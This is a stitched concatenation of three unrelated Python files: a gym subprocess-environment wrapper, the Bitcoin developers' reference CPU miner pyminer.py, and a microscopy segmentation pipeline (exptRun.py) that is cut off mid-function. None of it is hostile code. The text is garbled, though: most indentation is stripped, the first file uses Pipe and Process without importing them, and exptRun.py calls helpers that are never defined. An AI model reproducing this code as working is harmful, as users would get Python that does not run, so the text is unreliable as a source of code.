from multiprocessing.connection import Connection
from typing import Any, Callable
from gym import Env
class SubprocessEnv(Env):
    """Run a gym Env in a child process and proxy step/reset/render/close calls over a Pipe."""
    def __init__(self, factory: Callable[[], Env], blocking: bool = True):
self._blocking = blocking
self._parent_conn, child_conn = Pipe()
self._process = Process(target=self._start, args=(factory, child_conn))
self._process.start()
self.observation_space, self.action_space = self._parent_conn.recv()
def _start(self, factory: Callable[[], Env], connection: Connection):
env = factory()
_ = env.reset()
connection.send((env.observation_space, env.action_space))
terminate = False
while not terminate:
command, kwargs = connection.recv()
if command == 'render':
rendering = env.render(**kwargs)
connection.send(rendering)
elif command == 'step':
step = env.step(**kwargs)
connection.send(step)
elif command == 'reset':
obs = env.reset(**kwargs)
connection.send(obs)
elif command == 'close':
terminate = True
connection.close()
def step(self, action):
self._parent_conn.send(('step', dict(action=action)))
return self._return()
def reset(self, **kwargs):
self._parent_conn.send(('reset', kwargs))
return self._return()
def render(self, mode: str = 'human', **kwargs):
self._parent_conn.send(('render', {'mode': mode, **kwargs}))
return self._return()
def close(self):
self._parent_conn.send(('close', False))
self._parent_conn.close()
def _return(self) -> Any:
if self._blocking:
return self._parent_conn.recv()
else:
return lambda: self._parent_conn.recv()
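# Minimal usage sketch (assumptions, not part of the original module: gym is installed,
# 'CartPole-v1' is registered, and the classic 4-tuple step API is in use).
if __name__ == '__main__':
    import gym

    def make_env() -> Env:
        return gym.make('CartPole-v1')

    env = SubprocessEnv(make_env, blocking=True)
    first_obs = env.reset()
    obs, reward, done, info = env.step(env.action_space.sample())
    env.close()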
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
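# Illustrative example (not from the source; assumes a little-endian host): for the
# 8-byte buffer '\x01\x02\x03\x04\x05\x06\x07\x08',
#   bufreverse(buf)  -> '\x04\x03\x02\x01\x08\x07\x06\x05'  (bytes swapped within each 32-bit word)
#   wordreverse(buf) -> '\x05\x06\x07\x08\x01\x02\x03\x04'  (order of the 32-bit words reversed)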
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4338
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
exptRun.py
|
from scipy.ndimage.measurements import find_objects
import torch.multiprocessing as mp
import psycopg2 as pgdatabase
import torch
import argparse
import os
import sys
import time
import math
import pickle
import h5py
from pathlib import Path
from functools import partial
from torchvision import transforms, utils
from queue import Empty
from pycromanager import Acquisition, Bridge
from narsil.liverun.utils import queueDataset, resizeOneImage, tensorizeOneImage, normalize
from datetime import datetime
from torch.utils.data import DataLoader, Dataset
from narsil.segmentation.network import basicUnet, smallerUnet
from PySide6.QtWidgets import QApplication, QMainWindow, QMessageBox, QFileDialog
from skimage import io
from datetime import datetime
from scipy.signal import find_peaks
from skimage.morphology import remove_small_objects
import numpy as np
from skimage.measure import regionprops, label
from skimage import img_as_ubyte
import concurrent.futures
try:
    mp.set_start_method('spawn')
except RuntimeError:
    # the start method may already have been set elsewhere
    pass
"""
ExptProcess class that creates runs all the processes and
manages shared objects between processes and status of each process
"""
class exptRun(object):
def __init__(self):
# Image acquisition events that you get from GUI
self.acquireEvents = None
# Image process parameters needed to be set
# network model paths are also in imageProcessParameter
self.imageProcessParameters = None
# DB parameters that you get from GUI, used for writing data
# in to the database
self.dbParameters = None
# queues and kill events
self.segmentQueue = mp.Queue()
# write queue will grab the position and write properties and run a thread pool to parallelize
# the calculations as writing is the slowest part of the system
self.writeQueue = mp.Queue()
#self.acquireProcess = None
#self.segmentProcess = None
#self.deadAliveProcess = None
self.acquireKillEvent = mp.Event()
self.segmentKillEvent = mp.Event()
self.writeKillEvent = mp.Event()
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
        # datasets: these are wrappers around the torch multiprocessing queues above,
        # so that an iterable DataLoader can fetch incoming data from them
self.segmentDataset = queueDataset(self.segmentQueue)
self.writeDataset = queueDataset(self.writeQueue)
self.cellSegNet = None
self.channelSegNet = None
self.maxTimepoints = 50
self.channelProcessParameters = {
'segThreshold': 0.8,
'minPeaksDistance': 25,
'barcodeWidth': 48,
'minChannelLength':100,
'smallObjectsArea': 64,
'magnification': 40,
'channelsPerBlock': 21,
'channelWidth': 36,
'plateauSize': 15,
}
self.GPUParameters = {
'cellNetBatchSize': 1,
'channelNetBatchSize': 1,
'deadAliveNetBatchSize': 20,
}
self.cellProcessParameters = {
'segThreshold': 0.85,
'smallObjectsArea': 64
}
self.deadAliveParameters = {
}
#def createProcesses(self):
# # all the stuff needed to for processing functions
# # like the networks used etc
# self.acquireProcess = tmp.Process(target=self.acquire, name='acquireProcess')
# self.segmentProcess = tmp.Process(target=self.segment, name='segmentProcess')
# self.deadAliveProcess = tmp.Process(target=self.deadalive, name='deadaliveProcess')
def loadNets(self):
sys.stdout.write(f"Loading networks and sending to device ...\n")
sys.stdout.flush()
# Load the cell-segmentation and channel-segmentation model
cellSegModelPath = Path(self.imageProcessParameters["cellModelPath"])
cellNetState = torch.load(cellSegModelPath, map_location=self.device)
# use the net depending on what model is loaded
if cellNetState['modelParameters']['netType'] == 'big':
self.cellSegNet = basicUnet(cellNetState['modelParameters']['transposeConv'])
elif cellNetState['modelParameters']['netType'] == 'small':
self.cellSegNet = smallerUnet(cellNetState['modelParameters']['transposeConv'])
self.cellSegNet.load_state_dict(cellNetState['model_state_dict'])
self.cellSegNet.to(self.device)
self.cellSegNet.eval()
# channel segmentation model
channelSegModelPath = Path(self.imageProcessParameters["channelModelPath"])
channelNetState = torch.load(channelSegModelPath, map_location=self.device)
# use the net depending on what model is loaded
if channelNetState['modelParameters']['netType'] == 'big':
self.channelSegNet = basicUnet(channelNetState['modelParameters']['transposeConv'])
elif channelNetState['modelParameters']['netType'] == 'small':
self.channelSegNet = smallerUnet(channelNetState['modelParameters']['transposeConv'])
self.channelSegNet.load_state_dict(channelNetState['model_state_dict'])
self.channelSegNet.to(self.device)
self.channelSegNet.eval()
# dead-alive net model
sys.stdout.write(f"Networks loaded onto {self.device} successfully ...\n")
sys.stdout.flush()
# all the transformations can be set depending on the images taken
def setImageTransforms(self):
# operations on the images before processing
self.phaseImageSize = (self.imageProcessParameters["imageHeight"], self.imageProcessParameters["imageWidth"])
self.resize = resizeOneImage(self.phaseImageSize, self.phaseImageSize)
self.normalize = normalize()
self.tensorize = tensorizeOneImage()
self.segTransforms = transforms.Compose([self.resize, self.normalize, self.tensorize])
# set operations on the dead-alive single mother-machine channel images
def putImagesInSegQueue(self, image, metadata):
sys.stdout.write(f"Image Acquired ... {image.shape} .. {metadata['Axes']} .. {metadata['Time']}\n")
sys.stdout.flush()
# transform the image into a tensor
imageTensor = self.segTransforms(image)
# put the image into the segmentDataset
try:
self.segmentQueue.put({'image': imageTensor,
'position': metadata['Axes']['position'],
'time': metadata['Axes']['time']})
except Exception as error:
sys.stderr.write(f"Image at position: {metadata['Axes']['position']} and time: {metadata['Axes']['time']}\n")
sys.stderr.write(f"Error: {error}")
sys.stderr.flush()
# write to database
self.recordInDatabase('arrival', metadata)
def recordInDatabase(self, tableName, data):
con = None
try:
con = pgdatabase.connect(database=self.dbParameters['dbname'],
user=self.dbParameters['dbuser'],
password=self.dbParameters['dbpassword'])
cur = con.cursor()
con.autocommit = True
if tableName == 'arrival':
# insert the arrival of the image into the database table arrival
cur.execute("""INSERT INTO arrival (time, position, timepoint)
VALUES (%s, %s, %s)""", (datetime.now(), int(data['Axes']['position']),
int(data['Axes']['time']),))
elif tableName == 'segment':
cur.execute("""INSERT INTO segment (time, position, timepoint, locations, numchannels)
VALUES (%s, %s, %s, %s, %s)""", (datetime.now(), int(data['position']),
int(data['time']), data['locations'], data['numchannels'],))
elif tableName == 'growth':
for datapoint in data:
cur.execute("""INSERT INTO growth (time, position, timepoint, channelno, areas, lengths, numobjects)
VALUES (%s, %s, %s, %s, %s, %s, %s)""", (datetime.now(), int(datapoint['position']),
int(datapoint['timepoint']), datapoint['channelno'], datapoint['areas'],
datapoint['lengths'], datapoint['numobjects'],))
except pgdatabase.DatabaseError as e:
sys.stderr.write(f"Error in writing to database: {e}\n")
sys.stderr.flush()
finally:
if con:
con.close()
def getLocationsFromDatabase(self, tableName, position, time):
con = None
try:
con = pgdatabase.connect(database=self.dbParameters['dbname'],
user=self.dbParameters['dbuser'],
password=self.dbParameters['dbpassword'])
cur = con.cursor()
con.autocommit = True
if tableName == 'segment':
cur.execute("SELECT locations FROM segment WHERE position=%s AND timepoint=%s", (position, time))
                # the locations come back as a pickled byte string that needs to be unpickled
rows = cur.fetchall()
channelLocations = pickle.loads(rows[0][0])
return channelLocations
except pgdatabase.DatabaseError as e:
sys.stderr.write(f"Error in getting channel locations for m database: {e}\n")
sys.stderr.flush()
finally:
if con:
con.close()
def waitForPFS(self, event, bridge, event_queue):
# wait for focus before acquisition
if not self.acquireKillEvent.is_set():
core = bridge.get_core()
core.full_focus()
#print(event)
return event
# fake acquiring outside to test positions
def acquireFake(self):
#self.loadNets()
#testDataDir = Path("C:\\Users\\Praneeth\\Documents\\Elflab\\Code\\testdata\\hetero40x")
#testDataDir = Path("D:\\Jimmy\\EXP-21-BY1006\\therun")
#testDataDir = Path("D:\\praneeth\\hetero40x")
#testDataDir = Path("/home/pk/Documents/EXP-21-BY1006/therun")
testDataDir = Path("/home/pk/Documents/realtimeData/hetero40x")
for event in self.acquireEvents:
print(f"{event['axes']['position']} -- {event['axes']['time']}")
positionStr = "Pos10" + str(event['axes']['position'])
imgName = imgFilenameFromNumber(int(event['axes']['time']))
channelName = str(event['channel']['config'])
imagePath = testDataDir / positionStr / channelName/ imgName
#print(event)
metadata = {
'Axes': {'position': int(event['axes']['position']),
'time' : int(event['axes']['time'])},
'Time': str(datetime.now())
}
img = io.imread(imagePath)
self.putImagesInSegQueue(img, metadata)
print(imagePath)
print("--------")
time.sleep(0.3)
while not self.acquireKillEvent.is_set():
try:
time.sleep(1)
continue
except KeyboardInterrupt:
self.acquireKillEvent.set()
sys.stdout.write("AcquireFake process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("AcquireFake process completed successfully")
sys.stdout.flush()
def acquire(self):
numPositions = 40
sleepTime = 20 # time to sleep between timepoints
for i, event in enumerate(self.acquireEvents, 1):
with Acquisition(image_process_fn=partial(self.putImagesInSegQueue), post_hardware_hook_fn=self.waitForPFS, debug=False) as acq:
if not self.acquireKillEvent.is_set():
acq.acquire(event)
# hackish
else:
break
if i % numPositions == 0:
time.sleep(sleepTime)
while not self.acquireKillEvent.is_set():
try:
time.sleep(3)
except KeyboardInterrupt:
self.acquireKillEvent.set()
sys.stdout.write("Acquire process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("Acquire process completed successfully\n")
sys.stdout.flush()
# do all the writing to file system using this function,
# abstract out the logic for different cases
def writeFile(self, image, imageType, position, time, channelLocations=None):
# construct directories if they are not there
mainAnalysisDir = Path(self.imageProcessParameters["saveDir"])
if imageType == 'cellSegmentation':
filename = str(time) + '.tiff'
positionDir = str(position)
cellMaskDir = mainAnalysisDir / positionDir / imageType
if not cellMaskDir.exists():
cellMaskDir.mkdir(parents=True, exist_ok=True)
cellMaskFilename = cellMaskDir / filename
image = image * 255
io.imsave(cellMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(str(cellMaskFilename) + " written \n")
sys.stdout.flush()
elif imageType == 'phaseFullImage':
filename = str(time) + '.tiff'
positionDir = str(position)
phaseDir = mainAnalysisDir / positionDir/ imageType
if not phaseDir.exists():
phaseDir.mkdir(parents=True, exist_ok=True)
phaseFilename = phaseDir/ filename
sys.stdout.write(f"{phaseFilename} written\n")
sys.stdout.flush()
io.imsave(phaseFilename, image.astype('float16'), plugin='tifffile')
elif imageType == 'channelSegmentation':
# construct filename
filename = str(time) + '.tiff'
positionDir = str(position)
channelMaskDir = mainAnalysisDir / positionDir / imageType
if not channelMaskDir.exists():
channelMaskDir.mkdir(parents=True, exist_ok=True)
channelMaskFilename = channelMaskDir / filename
image = image * 255
io.imsave(channelMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(str(channelMaskFilename) + " written \n")
sys.stdout.flush()
elif imageType == 'oneMMChannelCellSeg':
            if channelLocations is None:
sys.stdout.write(f"Channel locations missing for Pos: {position} and time: {time}\n")
sys.stdout.flush()
else:
filename = str(time) + '.tiff'
positionDir = str(position)
channelWidth = self.channelProcessParameters['channelWidth'] //2
image = image * 255
for (i, location) in enumerate(channelLocations, 0):
channelNo = str(i)
channelDir = mainAnalysisDir / positionDir / imageType / channelNo
if not channelDir.exists():
channelDir.mkdir(parents=True, exist_ok=True)
channelImg = image[:,
location - channelWidth: location + channelWidth]
channelFileName = channelDir / filename
io.imsave(channelFileName, channelImg.astype('uint8'), check_contrast=False, compress=6, plugin='tifffile')
sys.stdout.write(f"{len(channelLocations)} from pos: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'oneMMChannelPhase':
# check if there are locations
            if channelLocations is None:
sys.stdout.write(f"Channel Locations missing for Pos:{position} and time:{time}\n")
sys.stdout.flush()
else:
# create directories if not existing and write the stack
filename = str(time) + '.tiff'
positionDir = str(position)
channelWidth = self.channelProcessParameters['channelWidth'] // 2
for (i, location) in enumerate(channelLocations, 0):
channelNo = str(i)
channelDir = mainAnalysisDir / positionDir/ imageType / channelNo
if not channelDir.exists():
channelDir.mkdir(parents=True, exist_ok=True)
channelImg = image[:,
location - channelWidth: location+ channelWidth]
# write the image
channelFileName = channelDir / filename
io.imsave(channelFileName, channelImg, check_contrast=False, compress = 6, plugin='tifffile')
sys.stdout.write(f"{len(channelLocations)} from pos: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'barcodes':
# you get a list of images instead of one image
positionDir = str(position)
barcodesDir = mainAnalysisDir / positionDir/ imageType
if not barcodesDir.exists():
barcodesDir.mkdir(parents=True, exist_ok=True)
for i, oneBarcode in enumerate(image, 0):
filename = str(time) + "_" + str(i) + '.jpg'
oneBarcodeFilename = barcodesDir / filename
io.imsave(oneBarcodeFilename, oneBarcode, check_contrast=False, compress=6,
plugin='tifffile')
sys.stdout.write(f"{len(image)} barcodes written to disk \n")
sys.stdout.flush()
def writeFileH5Py(self, image, imageType, position, time, channelLocations=None):
mainAnalysisDir = Path(self.imageProcessParameters["saveDir"])
if imageType == 'cellSegmentation':
filename = str(time) + '.tiff'
positionDir = str(position)
cellMaskDir = mainAnalysisDir / positionDir / imageType
if not cellMaskDir.exists():
cellMaskDir.mkdir(parents=True, exist_ok=True)
cellMaskFilename = cellMaskDir / filename
image = image * 255
io.imsave(cellMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(f"{cellMaskFilename} written\n")
sys.stdout.flush()
elif imageType == 'phaseFullImage':
filename = str(time) + '.tiff'
positionDir = str(position)
phaseDir = mainAnalysisDir / positionDir/ imageType
if not phaseDir.exists():
phaseDir.mkdir(parents=True, exist_ok=True)
phaseFilename = phaseDir/ filename
sys.stdout.write(f"{phaseFilename} written\n")
sys.stdout.flush()
io.imsave(phaseFilename, image.astype('float16'), plugin='tifffile')
elif imageType == 'channelSegmentation':
filename = str(time) + '.tiff'
positionDir = str(position)
channelMaskDir = mainAnalysisDir / positionDir / imageType
if not channelMaskDir.exists():
channelMaskDir.mkdir(parents=True, exist_ok=True)
channelMaskFilename = channelMaskDir / filename
image = image * 255
io.imsave(channelMaskFilename, image.astype('uint8'), compress=6, check_contrast=False,
plugin='tifffile')
sys.stdout.write(f"{channelMaskFilename} written\n")
sys.stdout.flush()
elif imageType == 'oneMMChannelCellSeg':
            if channelLocations is None:
sys.stdout.write(f"Channel locations missing for Pos: {position} and time: {time}\n")
sys.stdout.flush()
else:
positionDir = str(position)
writeDir = mainAnalysisDir / positionDir/ imageType
if not writeDir.exists():
writeDir.mkdir(parents=True, exist_ok=True)
height, width = image.shape
channelWidth = self.channelProcessParameters['channelWidth'] // 2
if time == 0:
                    # create one hdf5 stack for each of the channel locations
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
with h5py.File(writeDir / filename, 'a') as f:
f.create_dataset("stack",
(self.maxTimepoints, height, self.channelProcessParameters['channelWidth']),
dtype='float16', compression='gzip')
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
else:
# open and write
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
with h5py.File(writeDir/filename, 'a') as f:
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
sys.stdout.write(f"{len(channelLocations)} from position: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'oneMMChannelPhase':
            if channelLocations is None:
sys.stdout.write(f"Channel locations missing for Pos: {position} and time: {time}\n")
sys.stdout.flush()
else:
positionDir = str(position)
writeDir = mainAnalysisDir / positionDir/ imageType
if not writeDir.exists():
writeDir.mkdir(parents=True, exist_ok=True)
height, width = image.shape
channelWidth = self.channelProcessParameters['channelWidth'] // 2
if time == 0:
                    # create one hdf5 stack for each of the channel locations
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
sys.stdout.write(f"{writeDir/filename} --- {location} -- {channelWidth}\n")
sys.stdout.flush()
with h5py.File(writeDir / filename, 'a') as f:
f.create_dataset("stack",
(self.maxTimepoints, height, self.channelProcessParameters['channelWidth']),
dtype='float16', compression='gzip')
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
else:
# open and write
for i, location in enumerate(channelLocations, 0):
filename = str(i) + '.hdf5'
with h5py.File(writeDir/filename, 'a') as f:
f['stack'][time] = image[:,
location - channelWidth : location + channelWidth]
sys.stdout.write(f"{len(channelLocations)} from position: {position} and time: {time} written\n")
sys.stdout.flush()
elif imageType == 'barcodes':
positionDir = str(position)
barcodesDir = mainAnalysisDir / positionDir/ imageType
if not barcodesDir.exists():
barcodesDir.mkdir(parents=True, exist_ok=True)
for i, oneBarcode in enumerate(image, 0):
filename = str(time) + "_" + str(i) + '.tiff'
oneBarcodeFilename = barcodesDir / filename
io.imsave(oneBarcodeFilename, oneBarcode, check_contrast=False, compress=6, plugin='tifffile')
sys.stdout.write(f"{len(image)} barcodes written to disk\n")
sys.stdout.flush()
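    # Illustrative on-disk layout produced by writeFileH5Py (saveDir is whatever the GUI
    # configured; names are examples):
    #   <saveDir>/<position>/cellSegmentation/<time>.tiff
    #   <saveDir>/<position>/oneMMChannelPhase/<channel no>.hdf5, each holding a 'stack'
    #   dataset of shape (maxTimepoints, image height, channelWidth) that is filled one
    #   timepoint at a time.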
# return the number of channels detected, locations to write to database
# assume it is one image per batch
# TODO: batching of images done later
def processChannels(self, image, position, time):
        # pass the image through the cell segmentation net to get a mask
sys.stdout.write(f"Image is on GPU: {image.is_cuda} -- \n")
sys.stdout.flush()
cellSegMask = torch.sigmoid(self.cellSegNet(image)) > self.cellProcessParameters['segThreshold']
# send to cpu to be saved cut according to position
cellSegMaskCpu = cellSegMask.cpu().detach().numpy().squeeze(0).squeeze(0)
# remove smaller objects
#cellSegMaskCpu = remove_small_objects(cellSegMaskCpu.astype('bool'), min_size=self.cellProcessParameters['smallObjectsArea'])
self.writeFileH5Py(cellSegMaskCpu, 'cellSegmentation', position, time)
# get the phase image and use it to crop channels for viewing
phase_img = image.cpu().detach().numpy().squeeze(0).squeeze(0)
self.writeFileH5Py(phase_img, 'phaseFullImage', position, time)
# pass through net and get the results
        # change of approach: we only find channels in the first image and reuse those locations
        # for the rest of the images, since taking channel locations from every image can
        # accumulate errors in weird ways, especially on 40x data of lower quality
if time == 0:
channelSegMask = torch.sigmoid(self.channelSegNet(image)) > self.channelProcessParameters['segThreshold']
# sent to cpu and saved according to position and timepoint
channelSegMaskCpu = channelSegMask.cpu().detach().numpy().squeeze(0).squeeze(0)
# need to remove smaller objects of the artifacts
#channelSegMaskCpu = remove_small_objects(channelSegMaskCpu.astype('bool'), min_size = self.channelProcessParameters['smallObjectsArea'])
self.writeFileH5Py(channelSegMaskCpu, 'channelSegmentation', position, time)
hist = np.sum(channelSegMaskCpu, axis = 0) > self.channelProcessParameters['minChannelLength']
peaks, _ = find_peaks(hist, distance=self.channelProcessParameters['minPeaksDistance'],
plateau_size=self.channelProcessParameters['plateauSize'])
locationsBarcodes, locationsChannels = findBarcodesAndChannels(peaks,
self.channelProcessParameters)
# grab barcode and then grab the channels in each image and write
barcodeImages = []
barcodeWidth = self.channelProcessParameters['barcodeWidth']
for location in locationsBarcodes:
barcode_img = phase_img[:, location - barcodeWidth//2: location + barcodeWidth//2]
barcodeImages.append(barcode_img)
# stack the barcode and write all at the same time
self.writeFileH5Py(barcodeImages, 'barcodes', position, time)
sys.stdout.write(f"No of barcode regions detected: {len(barcodeImages)}\n")
sys.stdout.flush()
if len(locationsChannels) == 0:
sys.stdout.write(f"Skipping position: {position} data\n")
sys.stdout.flush()
# record failed status to the database
else:
                # write the channels appropriately
sys.stdout.write(f"No of channels identified: {len(locationsChannels)}\n")
sys.stdout.flush()
# write the phase and segmented mask chopped files
#self.writeFileH5Py(phase_img, 'oneMMChannelPhase', position, time, channelLocations=locationsChannels)
#self.writeFileH5Py(cellSegMaskCpu, 'oneMMChannelCellSeg', position, time, channelLocations=locationsChannels)
# write positions to database
dataToDatabase = {
'time': time,
'position': position,
'locations': pickle.dumps(locationsChannels),
'numchannels': len(locationsChannels)
}
self.recordInDatabase('segment', dataToDatabase)
else:
# what to do for the rest of the timepoint, use the positions from above
# get channel locations from the database
locationsChannels = self.getLocationsFromDatabase('segment', position, 0)
# write phase images
#self.writeFileH5Py(phase_img, 'oneMMChannelPhase', position, time, channelLocations=locationsChannels)
# write cell segmentation images
#self.writeFileH5Py(cellSegMaskCpu, 'oneMMChannelCellSeg', position, time, channelLocations=locationsChannels)
dataToDatabase = {
'time': time,
'position': position,
'locations': pickle.dumps(locationsChannels),
'numchannels': len(locationsChannels)
}
self.recordInDatabase('segment', dataToDatabase)
sys.stdout.write("\n ---------\n")
sys.stdout.flush()
return locationsChannels
def processCells(self, image, position, time, channelLocations):
        # pass the image through the cell segmentation net to get a mask
cellSegMask = torch.sigmoid(self.cellSegNet(image)) > self.cellProcessParameters['segThreshold']
# send to cpu to be saved cut according to position
cellSegMaskCpu = cellSegMask.cpu().detach().numpy().squeeze(0).squeeze(0)
# remove smaller objects
cellSegMaskCpu = remove_small_objects(cellSegMaskCpu.astype('bool'), min_size=self.cellProcessParameters['smallObjectsArea'])
self.writeFile(cellSegMaskCpu, 'cellSegmentation', position, time)
def segment(self):
# segmentation loop for both cell and channels
sys.stdout.write(f"Starting segmentation ... \n")
sys.stdout.flush()
self.loadNets()
while not self.segmentKillEvent.is_set():
try:
dataloader = DataLoader(self.segmentDataset, batch_size=1)
with torch.no_grad():
                    for data in dataloader:
                        if data is None:
                            continue
                        image = data['image'].to(self.device)
channelLocations = self.processChannels(image, int(data['position']), int(data['time']))
# put the datapoint in the queue for calculating the growth stuff like areas, lengths, etc
del image
self.writeQueue.put({
'position': int(data['position']),
'time': int(data['time']),
'numchannels': len(channelLocations)
})
#sys.stdout.write(f"Image shape segmented: {image.shape}--{data['position']} -- {data['time']} \n")
#sys.stdout.flush()
except Empty:
sys.stdout.write("Segmentation queue is empty .. but process shutdown is not happening\n")
sys.stdout.flush()
except KeyboardInterrupt:
self.segmentKillEvent.set()
sys.stdout.write(f"Segmetation process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("Segmentation process completed successfully\n")
sys.stdout.flush()
def calculateOnePosition(self, datapoint):
# calculate the properties of one position and write them to the database
try:
mainAnalysisDir = Path(self.imageProcessParameters["saveDir"])
position = int(datapoint[0])
time = int(datapoint[1])
channelLocations = self.getLocationsFromDatabase('segment', int(datapoint[0]), 0)
# get channel locations from database
filename = str(time) + '.tiff'
positionDir = str(position)
#phaseImageFilename = mainAnalysisDir / positionDir / "phaseFullImage" / filename
segImageFilename = mainAnalysisDir / positionDir / "cellSegmentation" / filename
# read the phase image cut and write
#phase_img = io.imread(phaseImageFilename)
seg_img = io.imread(segImageFilename)
seg_img = seg_img.astype('uint8')
# data for one image is bundled and added to the database at once
dataToDatabase = []
channelWidth = self.channelProcessParameters['channelWidth'] // 2
for (i, location) in enumerate(channelLocations, 0):
channelNo = str(i)
#phaseChannelsDir = mainAnalysisDir / positionDir/ "oneMMChannelPhase" / channelNo
